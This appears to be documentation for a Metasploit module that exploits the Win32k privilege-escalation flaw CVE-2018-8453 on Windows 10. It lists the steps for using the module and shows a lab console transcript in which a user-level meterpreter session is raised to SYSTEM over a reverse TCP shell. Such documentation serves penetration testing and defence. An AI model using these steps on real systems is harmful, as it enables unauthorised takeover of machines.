## Vulnerable Application

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

This module has been tested with Windows 10 v1703 x86. Offsets within the solution may need to be adjusted to work with other version of Windows.

## Verification Steps

1. Get a non-SYSTEM meterpreter session on Win10 v1703 x86
2. `use exploit/windows/local/cve_2018_8453_win32k_priv_esc`
3. `set session <session>`
4. `exploit`
5. Get a SYSTEM session

## Scenarios

### Windows 10 v1703 x86

```
msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  1         meterpreter x86/windows  DESKTOP-T6J3V2L\testuser @ DESKTOP-T6J3V2L  172.22.222.136:4444 -> 172.22.222.130:49693 (172.22.222.130)

msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > set session 1
session => 1
msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Sending stage (179779 bytes) to 172.22.222.130
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:49695) at 2019-06-20 08:53:01 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-T6J3V2L
OS              : Windows 10 (Build 15063).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.130 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > 
```
